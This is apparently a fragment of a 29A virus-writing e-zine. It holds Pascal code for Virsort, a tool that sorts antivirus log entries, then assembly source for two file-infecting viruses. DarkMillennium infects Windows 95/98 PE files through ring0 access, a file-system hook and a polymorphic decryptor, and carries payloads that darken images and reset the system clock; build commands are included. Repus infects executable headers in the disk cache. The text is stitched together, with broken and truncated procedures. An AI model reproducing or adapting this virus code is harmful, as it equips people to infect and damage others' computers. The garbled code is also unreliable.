then break;
delete(virusname,1,last_bar+1);
flag1 := true;
end
else
begin
if pos('warning:',virusname) >0 then
begin
for last_bar:=length(virusname) downto 0 do if virusname[last_bar]=
':' then break;
delete(virusname,1,last_bar+1);
virusname := virusname+'.warning';
flag1 := true;
end;
end;
if flag1 = true then
begin
if pos(' ',virusname) >0 then
begin
tmp_str:=copy(virusname,1,pos(' ',virusname
)-1);
delete(virusname,1,pos(' ',virusname));
virusname:=concat(tmp_str+'_'+virusname);
end;
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(newfile,instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_found
else
begin
writeln(count,' new AVP virii found...');
writeln;
end;
Cierra_diccionarios;
close(newfile);
close(log);
longitud(log_file);
end;
end;
procedure CompareDAT_F(logname:string);
begin
writeln('Comparing virii from ',logname);
writeln('Detected F-Prot log file');
reset(log);
inicializa_diccionarios;
assign(f,'fprot.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_fprot
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
tmp_str:=('NEWFPROT.LOG');
assign(newfile,'NEWFPROT.LOG');
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
count:=1;
while IOResult = 0 do
begin
close(newfile);
str(count,tmp_str);
for i:=1 to 1-length(tmp_str) do tmp_str:=tmp_str;
tmp_str:=concat('NEWFPROT.LO'+tmp_str);
inc(count);
assign(newfile,tmp_str);
call_buffer;
settextbuf(newfile,tbuff^,tbuffsize);
{$I-}
reset(newfile);
{$I+}
end;
rewrite(newfile);
count := 0;
log_file:=tmp_str;
repeat
readln(log,instring);
space_position:=pos('ection: ',instring);
if space_position > 0 then
begin
virusname := instring;
delete(virusname,1,space_position+7);
if pos('New or',virusname) > 0 then
begin
delete(virusname,1,pos('of ',
virusname)+2);
virusname:=concat(virusname+
'.variant');
end;
if (parm1 = '-CS') or (parm1 = '-CSW') then
else if pos(' ',virusname) > 0 then delete(virusname,pos(' ',virusname),
length(virusname));
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(newfile,instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_found
else
begin
writeln(count,' new F-Prot virii found...');
writeln;
end;
Cierra_diccionarios;
close(newfile);
close(log);
longitud(log_file);
end;
end;
procedure AddNewDAT_A(logname:string);
begin
writeln('Adding virii from ',logname);
writeln('Detected AVP log file');
reset(log);
inicializa_diccionarios;
assign(f,'avp.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_avp
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
count := 0;
append(f);
repeat
readln(log,instring);
flag1 := false;
filename := instring;
virusname := instring;
if pos('infected:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-9,length(filename));
delete(virusname,1,last_bar+1);
flag1 := true;
end
else if pos('warning:',filename) > 0 then
begin
for last_bar:=length(filename) downto 0 do if filename[last_bar]=':'
then break;
delete(filename,last_bar-8,length(filename));
delete(virusname,1,last_bar+1);
virusname := virusname+'.warning';
flag1 := true;
end;
if flag1 = true then
begin
if pos(' ',virusname) >0 then
begin
tmp_str:=copy(virusname,1,pos(' ',virusname
)-1);
delete(virusname,1,pos(' ',virusname));
virusname:=concat(tmp_str+'_'+virusname);
end;
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
if (parm1 = '-AL') or (parm1 = '-ALS') then writeln(newfile,
instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_added
else
begin
writeln('Added ',count,' new virii for AVP...');
writeln;
end;
Cierra_diccionarios;
close(f);
close(log);
if (parm1 = '-AL') or (parm1 = '-ALS') then
begin
close(newfile);
longitud(log_file);
end;
end;
end;
procedure AddNewDAT_F(logname:string);
begin
writeln('Adding virii from ',logname);
writeln('Detected F-Prot log file');
reset(log);
inicializa_diccionarios;
assign(f,'fprot.dat');
call_buffer;
settextbuf(f,tbuff^,tbuffsize);
{$I-}
reset(f);
{$I+}
if IOResult <> 0 then not_find_fprot
else
begin
repeat
readln(f,virusname);
delete(virusname,1,pos(#1,virusname));
escribe_diccionario;
until eof(f);
close(f);
count := 0;
append(f);
repeat
readln(log,instring);
space_position:=pos('ection: ',instring);
if space_position > 0 then
begin
filename := instring;
virusname := instring;
delete(filename,space_position-5,length(filename));
delete(virusname,1,space_position+7);
if pos('New or',virusname) > 0 then
begin
delete(virusname,1,pos('of ',
virusname)+2);
virusname:=concat(virusname+
'.variant');
end;
if (parm1 = '-AS') or (parm1 = '-ALS') then
else if pos(' ',virusname) > 0 then delete(virusname,pos(' ',virusname),
length(virusname));
escribe_diccionario;
if test < 0 then
begin
inc(count);
writeln(f,filename,#1,virusname);
if (parm1 = '-AL') or (parm1 = '-ALS') then writeln(newfile,instring);
end;
end;
until eof(log);
if count=0 then no_new_virii_added
else
begin
writeln('Added ',count,' new virii for F-Prot...');
writeln;
end;
Cierra_diccionarios;
close(f);
close(log);
if (parm1 = '-AL') or (parm1 = '-ALS') then
begin
close(newfile);
longitud(log_file);
end;
end;
end;
procedure CountViruses;
begin
flag1 := false;
assign(f,'avp.dat');
{$I-}
reset(f);
{$I+}
if IOResult = 0 then
begin
flag1 := true;
count:= 0;
if parm1 = '-H' then
begin
repeat
readln(f,temp_string);
count := count + 1;
until eof(f);
writeln(count,' virii for AVP');
end
else
begin
repeat
readln(f,temp_string);
if pos('warning',temp_string) > 0 then
else count := count + 1;
until eof(f);
writeln(count,' unique virii for AVP');
end;
close(f);
end;
assign(f,'fprot.dat');
{$I-}
reset(f);
{$I+}
if IOResult = 0 then
begin
flag1 := true;
count := 0;
if parm1 = '-H' then
begin
repeat
readln(f,temp_string);
count := count + 1;
until eof(f);
writeln(count,' virii for F-Prot');
end
else
begin
repeat
readln(f,temp_string);
if (pos('unknown?',temp_string) > 0) or
(pos('damaged?',temp_string) > 0) then
else count := count + 1;
until eof(f);
writeln(count,' unique virii for F-Prot');
end;
close(f);
end;
procedure BuildNew;
begin
DetectLog;
if tipo = 'AVP' then BuildNewDat_A(parm2)
else if tipo = 'F-PROT' then BuildNewDat_F(parm2)
else no_virii;
end;
procedure CompareDat;
begin
DetectLog;
if tipo = 'AVP' then CompareDat_A(parm2)
else if tipo = 'F-PROT' then CompareDat_F(parm2)
else no_virii;
end;
procedure AddNewDat;
begin
DetectLog;
if tipo = 'AVP' then AddNewDat_A(parm2)
else if tipo = 'F-PROT' then AddNewDat_F(parm1)
else no_virii;
end;
begin
writeln;
writeln(' Virsort 2000 Special Edition for 29A #5 by VirusBuster/29A');
writeln(
'-=----------------------------------------------------------------------------=-');
parm1 := paramstr(1);
parm2 := paramstr(2);
parm3 := paramstr(3);
longintPtr=^longint;
dictionary=record name: string[40];
index,corpus: longArray;
frequency: longint;
fqPtr: longintPtr;
end;
const expectedWordLength=10;
type aRowPtr=^aRow;
aDictionaryPtr=^dictionary;
anIndex=array[0..0] of aRowPtr;
anIndexPtr=^anIndex;
aRow= array[0..0] of byte;
memRec=object
name: string[40];
bytesPerRow,bytesInIndex,lastRow,recordsPerRow,
bytesPerRecord,shift,mask: word;
maxRecordsInArray,lastRecord,pos: longint;
insertMode: boolean;
rowPtrNo: anIndexPtr;
dicPtr: aDictionaryPtr;
end;
implementation
uses crt;
GetMem(newIndex_,bytesInNewIndex);
Move(rowPtrNo^,newIndex_^,bytesInIndex);
FreeMem(rowPtrNo,bytesInIndex);
rowPtrNo:=newIndex_;
for i:=lastRow+1 to newLastRow do
begin
GetMem(rowPtrNo^[i],bytesPerRow);
FillChar(rowPtrNo^[i]^,bytesPerRow,0);
end;
lastRow:=newLastRow;
bytesInIndex:=bytesInNewIndex;
maxRecordsInArray:=(lastRow+1)*recordsPerRow;
end
end;
procedure MemClose;
begin
end;
procedure dicClose;
begin
end;
You can compare VS2000 8.88 speed, last version of official VS200, with
this version, and you will notice is the same. That means VS2000 never has
used any code from VSNG, as i have told many times already.
VirusBuster/29A
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[COMMENT.TXT]ÄÄÄ
; DarkMillennium Project
; developed by Clau / Ultimate Chaos
;
; The Project is a Win95/98 compatible virus.
; Also this is my first virus that infects PE files.
;
; Greets goes to all Ultimate Chaos members and all people in VX scene.
; Respect to all of you.
;
;----------------
; DESCRIPTION |
;----------------
;
; on program load :
; - it proccess a polymorphic decryptor
; - it is made in 2 parts
; - 1. Finding the key that encryption was made with (between 0 ... 65535)
; - 2. Decrypt the code with that key
; - check if it is already resident
; - if not, go into ring0
; - get memory with GetHeap
; - copy itself into allocated memory
; - hook the API (InstallFileSystemAPIhook)
; -return to host program
; on FS calls, if IFSFN_OPEN/IFSFN_RENAME/IFSFN_FILEATRIB
; - check if extension is EXE/SCR
; - check if the file format is PE
; - if so, infect the file
; - Generate random polymorphic decryptor, and write it to file
; - Encrypt the code with a simple XOR method using a random key witch is
never saved
; It use only 2 bytes buffer for encryption, it encrypt 2 bytes at a time and
write them
; into the file, until all the code is encrypted and written. This method is
slower,
; but low memory is used.
; - check for a condition and if it is true then display a message box trough VxD call
; payloads, the condition is the number of infected files be equal to
infected_nr_trigger
; - thanks goes to Midnyte (member of Ultimate Chaos, coder, GFXer) for helping me
with this nice payload
; - on BMP and GIF open they will go darker and darker on every open
; - on some BMPs and GIFs the effect is more cool, I can say strange
;
;----------------------------------------
; Polymoprhic engine description |
;----------------------------------------
;
; This is my first poly engine.
; - random junk code
; - do nothing instructions (instructions that do not interfer with the decryptor)
; - they are 1, 2 or more bytes instructions, and more instructions combined
; - 1 byte - cmc, clc, stc, nop
; - 2 bytes - a range of INTs
; - > 2 bytes - it can generate random MOV, PUSH, POP ... infact all instructions
; that are used in decryptor, without interfering with the decryptor (it use regs
; that are not used in decrypt process)
; - more ways to do the same thing instructions
; example : MOV EAX, 12345678h <=> PUSH 12345678h
; POP EAX
; - the decryptor size can be ~ 3 times bigger then the original decryptor
; - if the decryptor is smaller then the decryptor before, the space between it and the
encrypted code
; will be filled with junk.
;
;
; Compile with:
; tasm32 /m3 /ml darkmillennium.asm
; tlink32 /Tpe /aa /x darkmillennium.obj, darkmillennium.exe, , import32.lib
;
; report any bugs to clau@ultimatechaos.org
;
.386p
.model flat
extrn ExitProcess:proc
extrn MessageBoxA:proc
.code
Begin:
push 64
push offset w_title
push offset copyright
push 0
call MessageBoxA
jmp Start
.data
popad
; "alocate" space equal to current decryptor size, incase that the next generated
decryptors
; will be bigger, and it will be bigger then this one
; this space will be filled with random junk instructions
db ($ - offset Start) * 2 dup (90h) ; for big decryptors not overwrite Data Zone
Encr_Code:
key dw 9090h
jmp virus_code
IDT_Address dq 0
flag db 0
newaddress dd 0
exception dd 0
old_offset dd 0
filename db 260 dup (0)
handle dd 0
crt_move dd 0
peheader dd 0
S_Align dd 0
F_Align dd 0
sec_ptr dd 0
Old_EIP dd 0
SOI dd 0
virusplace dd 0
imagebase dd 0
infected_files dw 0
SEH_nextpointer dd ?
SEH_oldpointer dd ?
SEH_errorhandler dd ?
IMAGE_DOS_HEADER struc
MZ_magic dw ?
MZ_cblp dw ?
MZ_cp dw ?
MZ_crlc dw ?
MZ_cparhdr dw ?
MZ_minalloc dw ?
MZ_maxalloc dw ?
MZ_ss dw ?
MZ_sp dw ?
MZ_csum dw ?
MZ_ip dw ?
MZ_cs dw ?
MZ_lfarlc dw ?
MZ_ovno dw ?
MZ_res dw 4 dup (?)
MZ_oemid dw ?
MZ_oeminfo dw ?
MZ_res2 dw 10 dup (?)
MZ_lfanew dd ?
IMAGE_DOS_HEADER ends
IMAGE_DOS_HEADER_SIZE = SIZE IMAGE_DOS_HEADER
IMAGE_FILE_HEADER struc
PE_Magic dd ?
Machine dw ?
NumberOfSections dw ?
TimeDateStamp dd ?
PointerToSymbolTable dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
Characteristics dw ?
IMAGE_FILE_HEADER ends
IMAGE_FILE_HEADER_SIZE = SIZE IMAGE_FILE_HEADER
IMAGE_DATA_DIRECTORY struc
dd_VirtualAddress dd ?
dd_Size dd ?
IMAGE_DATA_DIRECTORY ends
IMAGE_DIRECTORY_ENTRIES struc
DE_Export IMAGE_DATA_DIRECTORY ?
DE_Import IMAGE_DATA_DIRECTORY ?
DE_Resource IMAGE_DATA_DIRECTORY ?
DE_Exception IMAGE_DATA_DIRECTORY ?
DE_Security IMAGE_DATA_DIRECTORY ?
DE_BaseReloc IMAGE_DATA_DIRECTORY ?
DE_Debug IMAGE_DATA_DIRECTORY ?
DE_Copyright IMAGE_DATA_DIRECTORY ?
DE_GlobalPtr IMAGE_DATA_DIRECTORY ?
DE_TLS IMAGE_DATA_DIRECTORY ?
DE_LoadConfig IMAGE_DATA_DIRECTORY ?
DE_BoundImport IMAGE_DATA_DIRECTORY ?
DE_IAT IMAGE_DATA_DIRECTORY ?
IMAGE_DIRECTORY_ENTRIES ends
IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
IMAGE_OPTIONAL_HEADER struc
OH_Magic dw ?
OH_MajorLinkerVersion db ?
OH_MinorLinkerVersion db ?
OH_SizeOfCode dd ?
OH_SizeOfInitializedData dd ?
OH_SizeOfUninitializedData dd ? ; Uninitialized Data
OH_AddressOfEntryPoint dd byte ptr ? ; Initial EIP
OH_BaseOfCode dd byte ptr ? ; Code Virtual Address
OH_BaseOfData dd byte ptr ? ; Data Virtual Address
OH_ImageBase dd byte ptr ? ; Base of image
OH_SectionAlignment dd ? ; Section Alignment
OH_FileAlignment dd ? ; File Alignment
OH_MajorOperatingSystemVersion dw ? ; Major OS
OH_MinorOperatingSystemVersion dw ? ; Minor OS
OH_MajorImageVersion dw ? ; Major Image version
OH_MinorImageVersion dw ? ; Minor Image version
OH_MajorSubsystemVersion dw ? ; Major Subsys version
OH_MinorSubsystemVersion dw ?
OH_Win32VersionValue dd ? ; win32 version
OH_SizeOfImage dd ? ; Size of image
OH_SizeOfHeaders dd ? ; Size of Header
OH_CheckSum dd ? ; unused
OH_Subsystem dw ? ; Subsystem
OH_DllCharacteristics dw ? ; DLL characteristic
OH_SizeOfStackReserve dd ? ; Stack reserve
OH_SizeOfStackCommit dd ? ; Stack commit
OH_SizeOfHeapReserve dd ? ; Heap reserve
OH_SizeOfHeapCommit dd ? ; Heap commit
OH_LoaderFlags dd ? ; Loader flags
OH_NumberOfRvaAndSizes dd ? ; Number of directories
UNION ; directory entries
OH_DataDirectory IMAGE_DATA_DIRECTORY\
IMAGE_NUMBEROF_DIRECTORY_ENTRIES DUP (?)
OH_DirectoryEntries IMAGE_DIRECTORY_ENTRIES ?
ends
ends
IMAGE_OPTIONAL_HEADER_SIZE = SIZE IMAGE_OPTIONAL_HEADER
IMAGE_SECTION_HEADER struc
SH_Name db 8 dup (?)
UNION
SH_PhusicalAddress dd byte ptr ?
SH_VirtualSize dd ?
ends
SH_VirtualAddress dd byte ptr ?
SH_SizeOfRawData dd ?
SH_PointerToRawData dd byte ptr ?
SH_PointerToRelocations dd byte ptr ?
SH_PointerToLinenumbers dd byte ptr ?
SH_NumberOfRelocations dw ?
SH_NumberOfLinenumbers dw ?
SH_Characteristics dd ?
IMAGE_SECTION_HEADER ends
IMAGE_SECTION_HEADER_SIZE = SIZE IMAGE_SECTION_HEADER
mz_header IMAGE_DOS_HEADER ?
pe_header IMAGE_FILE_HEADER ?
oh_header IMAGE_OPTIONAL_HEADER ?
section IMAGE_SECTION_HEADER ?
go_into_ring0: int exception_int ; This will jump us to Ring0 proc in ring0 mode
generation_1: push 0
call ExitProcess
Ring0 proc
pusha
; hook API
lea eax, [edi + API_hook - Start]
push eax
patch2_val equ InstallFileSystemAPIhook + 256 * 256 * IFSMgr
patch2 label far
VxDCall IFSMgr, InstallFileSystemAPIhook
pop ebx
mov [edi + nexthook - Start], eax
jmp success
back_to_ring3: popad
iretd
Ring0 endp
push ebx
push esi
push edi
db 0bfh
delta1 dd 0
; Unicode conversion
no_path: push 0 ; BCS/WANSI code
push 260 ; maximum filename
mov eax, [ebp + 28] ; get IOREQ
mov eax, [eax + 12]
add eax, 4
push eax ; push filename
push esi ; push destination
; Address of Entrypoint to our virus ( Old Virtual Address + New Virtual Size -
Virus Size )
lea esi, [edi + section - Start]
mov eax, dword ptr [esi.SH_VirtualAddress]
add eax, dword ptr [esi.SH_VirtualSize]
sub eax, virussize
lea esi, [edi + oh_header - Start]
mov dword ptr [esi.OH_AddressOfEntryPoint], eax
; Generate decryptor
pushad
mov ebp, edi
call GenDecryptor
popad
; Call Payload
call Payload
; Write decryptor
mov edx, edi
mov ecx, Encr_Code - Start
mov ebx, dword ptr [edi + handle - Start]
mov esi, dword ptr [edi + virusplace - Start]
xchg edx, esi
call file_write
not_exe: popa
db 0b8h
nexthook dd 0
call [eax]
add esp, 6 * 4
pop edi
pop esi
pop ebx
leave
ret
encryption_buffer dw 0
copy_in_buffer endp
get_rnd proc
push bx
xor bx, ax
xor bx, cx
xor bx, dx
xor bx, sp
xor bx, bp
xor bx, si
xor bx, di
in al, 40h
xor bl, al
in al, 40h
add bh, al
in al, 41h
sub bl, al
in al, 41h
xor bh, al
in al, 42h
add bl, al
in al, 42h
sub bh, al
xchg bx, ax
pop bx
ret
get_rnd endp
; Ring0 File_IO
;-------------------------
Ring0_File_IO proc
patch4_val equ Ring0_FileIO + 256 *256 * IFSMgr
patch4 label far
VxDCall IFSMgr, Ring0_FileIO
ret
Ring0_File_IO endp
file_open proc
mov bx, 2
mov cx, 0
mov dx, 1
mov eax, R0_opencreatefile
call Ring0_File_IO
ret
file_open endp
file_close proc
mov eax, R0_closefile
call Ring0_File_IO
ret
file_close endp
file_read proc
mov eax, R0_readfile
call Ring0_File_IO
ret
file_read endp
file_write proc
mov eax, R0_writefile
call Ring0_File_IO
ret
file_write endp
Payload proc
; as you see if the random number =< 500 then test the PC for year 2000
compatibilite :)
; infact it will jump into year 2000
; the chances to do it are 5%
mov al, 07h
out 70h, al
mov al, 01h
out 71h, al ; day of the month
mov al, 08h
out 70h, al
mov al, 01h
out 71h, al ; month to January
mov al, 09h
out 70h, al
mov al, 00h
out 71h, al ; year (0 = 2000)
; by the way ... this is a good test, you will see if your computer is compatible
with year 2000 ;)
; so i recommend you get infected with DarkMillennium
end_payload:popad
ret
WinBox dd ?
butt1 dw 0
butt2 dw 0001
butt3 dw 0
TitleOff dd offset WinTitle
TextOff dd offset WinText
Payload endp
bmp_Payload proc
pushad
; Open the file
lea esi, [edi + filename - Start]
call file_open
mov dword ptr [edi + handle - Start], eax
; Read file
lea esi, [edi + gfx_buffer - Start]
mov ebx, [edi + handle - Start]
mov ecx, 256
mov edx, 54
call file_read
; Write file
lea esi, [edi + gfx_buffer - Start]
mov ecx, 256
mov ebx, [edi + handle - Start]
mov edx, 54
call file_write
; Close file
mov ebx, [edi + handle - Start]
call file_close
popad
ret
bmp_Payload endp
gif_Payload proc
pushad
; Read file
lea esi, [edi + gfx_buffer - Start]
mov ebx, eax
mov ecx, 10Dh
mov edx, 0000h
call file_read
mov ax, 2
get_colours:shl ax, 1
loop get_colours
mov cx, ax
shl ax, 1
add cx, ax
lea esi, [edi + gfx_buffer - Start]
add esi, 000Dh
push edi
mov edi, esi
darken: lodsb
cmp al, 14h
jb skip_entry
sub al, 14h
stosb
skip_entry: loop darken
pop edi
exit_gif_payload:
; Close file
mov ebx, [edi + handle - Start]
call file_close
popad
ret
gif_Payload endp
; ------------------------------------------------------------
;| Poly Engine |
; ------------------------------------------------------------
; Generate decryptor
; EBP = location for decryptor
GenDecryptor proc
; call 00000000h
mov al, 0E8h
stosb
mov eax, 00000000h
stosd
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
call GenerateRegisters
; pushad
mov al, 60h
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; lea reg_1, [ebp + key - Start] -> key offset will be setted later
mov al, 8Dh
stosb
mov al, byte ptr [ebp + reg_1 - Start]
mov ebx, 8
mul ebx
add al, 85h
stosb
mov [ebp + var2 - Start], edi ; save EDI offset, for later use
mov eax, 00000000h
stosd
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; inc reg_2
mov [ebp + var1 - Start], edi ; save in var1 current pos for future use
mov al, 40h
add al, byte ptr [ebp + reg_2 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Save the number of register that contain the key for decryption
mov al, [ebp + reg_2 - Start]
mov [ebp + reg_key - Start], al
call GenerateRegisters
call GenerateFuckRegs
; lea reg_1, [ebp + key - Start] -> key offset will be setted later
mov al, 8Dh
stosb
mov al, byte ptr [ebp + reg_1 - Start]
mov ebx, 8
mul ebx
add al, 85h
stosb
mov [ebp + var3 - Start], edi ; save EDI offset, for later use
mov eax, 00000000h
stosd
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; inc reg_1
mov al, 40h
add al, byte ptr [ebp + reg_1 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; inc reg_1
mov al, 40h
add al, byte ptr [ebp + reg_1 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; dec reg_2
mov al, 48h
add al, byte ptr [ebp + reg_2 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; dec reg_2
mov al, 48h
add al, byte ptr [ebp + reg_2 - Start]
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; cmp reg_2, 1
mov al, 83h
stosb
mov al, 0F8h
add al, byte ptr [ebp + reg_2 - Start]
stosb
mov al, 01
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
; popad
mov al, 61h
stosb
; Generate Junk
xchg ebp, edi
call GenerateJunk
xchg ebp, edi
nop
nop
nop
nop
nop
GenDecryptor endp
; Generate reg3, not ESP, not EBP, <> reg1, <> reg2
get_reg_3: mov eax, 8
call random_in_range
cmp al, 4 ; no ESP
jz get_reg_3
cmp al, 5 ; no EBP
jz get_reg_3
cmp al, byte ptr [ebp + reg_1 - Start]
jz get_reg_3
cmp al, byte ptr [ebp + reg_2 - Start]
jz get_reg_3
cmp al, byte ptr [ebp + reg_key - Start]
jz get_reg_1
mov byte ptr [ebp + reg_3 - Start], al
popad
ret
GenerateRegisters endp
get_reg_fuck_2:
mov eax, 15
call random_in_range
cmp al, 7
jg ch_FFh
cmp al, 4 ; no ESP
jz get_reg_fuck_2
cmp al, 5 ; no EBP
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_1 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_2 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_3 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_fuck_1 - Start]
jz get_reg_fuck_2
cmp al, byte ptr [ebp + reg_key - Start]
jz get_reg_fuck_2
mov byte ptr [ebp + reg_fuck_2 - Start], al
GenerateFuckRegs_Exit:
popad
ret
GenerateFuckRegs endp
GenPutX1X2 endp
; Generate one byte instruction, put it in [EBP] and increase EBP with 1
; EBP = location for generated code
GenerateOneByteJunk proc
lea esi, [edi + OneByteTable - Start] ; Offset of the table
mov eax, offset EndOneByteTable - offset OneByteTable ; size of table
call random_in_range ; Must generate random numbers
add esi, eax ; Add AX ( AL ) to the offset
mov al, byte ptr [esi] ; Put selected opcode in al
xchg ebp, edi
stosb ; And store it in EDI ( points to
; the decryptor instructions )
xchg ebp, edi
ret
GenerateOneByteJunk endp
; The same with GenPutX1X2 but with random registers and/or values
; NOTE : the registers are not the ones that are already in use
GenRndPutX1X2 proc
xchg ebp, edi
; random in EDX
mov eax, 0FFFFh
call random_in_range
mov dx, ax
shl edx, 10h
mov eax, 0FFFFh
call random_in_range
mov dx, ax
; random types
mov eax, 2
call random_in_range
mov bl, al
mov bh, 00h ; registers like [EAX], [EBX] ... will not be generated, only
EAX, EBX ...
; 'cause it will give Access Violation in most of the cases
mov ax, bx
call GenerateFuckRegs
mov cl, byte ptr [ebp + reg_fuck_1 - Start]
mov ch, byte ptr [ebp + reg_fuck_2 - Start]
cmp ah, 0
jz mov_esp2
GenMovType endp
not_val_2: push ax
cmp al, 0
jnz not_wordreg
; PUSH reg2
mov al, 50h
add al, ch
stosb
jmp Pop_reg1
; PUSH val
mov ax, 6866h
stosw
mov ax, dx
stosw
mov ch, cl
jmp Pop_reg1
; Generate XOR reg1, reg1 ... ADD reg1, reg2/[reg2]/val ( = MOV reg1, reg2/[reg2]/val )
; EBP = location for code
; CL = reg1
; CH = reg2 ( if CH = 0FFh then use value from EDX instead of reg2 )
; ( in this case AH value will be ignored, no direct mem read like
; MOV EAX, [402000h] 'cause I don't use this kind of instructions in my decryptor )
; AL = type of registry to use 0 = word ( AX, BX ... )
; 1 = dword ( EAX, EBX ... )
; byte registers are not used in my decryptor
; AH = 0 use direct value ( EAX ... )
; 1 use memory address from register ( [EAX], [ESI] ... )
; EDX = use this value instead of reg2 in case CH = 0FFh
;
GenXorAddType proc
xchg ebp, edi
not_val_3: push ax
cmp al, 0
jnz not_wordreg_2
jmp wordreg_2
pop ax
cmp ah, 0
jz dwordreg_2
pop ax
cmp ah, 0
jz wordreg_2_
GenXorAddType_End:
xchg ebp, edi
ret
GenXorAddType endp
not_val_4: push ax
cmp al, 0
jnz not_wordreg_3
jmp wordreg_3
pop ax
cmp ah, 0
jz dwordreg_3
pop ax
cmp ah, 0
jz wordreg_3_
GenSubAddType_End:
xchg ebp, edi
ret
GenSubAddType endp
; Tables
RandomJunkTable:
OneByteJunk dd offset GenerateOneByteJunk
INTs dd offset GenerateINTs
_Nothing dd offset GenNothing
RndPutX1X2 dd offset GenRndPutX1X2
EndRandomJunkTable:
EndINTsTable:
PutX1X2Table:
MovType dd offset GenMovType
PushPopType dd offset GenPushPopType
XorAddType dd offset GenXorAddType
SubAddType dd offset GenSubAddType
EndPutX1X2Table:
regsTable:
reg_1 db 0
reg_2 db 0
reg_3 db 0
reg_key db 0
reg_fuck_1 db 0
reg_fuck_2 db 0
regsTableEnd:
_end:
end Begin
end
;=============;
; Repus virus ;
;=============;
;Coded by Super/29A
;-When an infected file is executed the virus patches IRQ0 handler and waits
; for it to return control to virus in ring0
;-Once in ring0, the virus searches in all caches a valid MZheader to infect,
; modifying EntryPoint (in PEheader) so virus can get control on execution
;-It will infect no more than one MZheader at a time per file system
;-MZheader will be overwritten, however windows executes it with no problems
; (tested under win95,win98,winNT and Win2K)
;-When executing a non infected file that imports APIs from an infected DLL,
; virus will get control on DLL inicialization and infect more MZheaders
;-------------------------------------------------------------------
.386p
.model flat,STDCALL
;-------------------------------------------------------------------
VCache_Enum macro
int 20h
dw 0009h
dw 048Bh
endm
;-------------------------------------------------------------------
.data
Title:
db 'Super/29A presents...',0
Text:
db 'Repus.'
db '0' + (VirusSize/100) mod 10
db '0' + (VirusSize/10) mod 10
db '0' + (VirusSize/1) mod 10
db 0
;-------------------------------------------------------------------
.code
;===================================================================
VirusStart:
VirusEntryPoint:
push edx
dec edx
jns JumpHost ; exit if we are running winNT
mov dl,0C3h
Wait_IRQ0:
cmp esp,edx
jb Wait_IRQ0
xchg dl,[ebx]
Next_FSD:
inc ah
jnz Next_FSD ; try next file system
call ebx ; return control to IRQ0 and return just after the CALL
JumpHost:
;-------------------------------------------------------------------
InfectCache:
sub eax,(JumpHost+5-VirusStart)
mov cl,(VirusSize-1)
;Here we are gonna find the pointer to the pending cache writes
mov ch,2
lea eax,[ecx-0Ch] ; EAX=1F4h ;-D
mov edi,[edx+0Ch] ; EDI = VRP (Volume Resource Pointer)
repnz scasd
jnz _ret ; not found :-(
;Now we are gonna insert this cache in the pending cache writes
_ret:
ret
db '29A'
VirusEnd:
;===================================================================
db 1000h dup(90h)
push 0
push offset Title
push offset Text
push 0
call MessageBoxA
push 0
call ExitProcess
HostEntryPoint endp
;===================================================================
ends
end VirusEntryPoint
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SENTINEL.ASM]ÄÄÄ
;........................................................................;
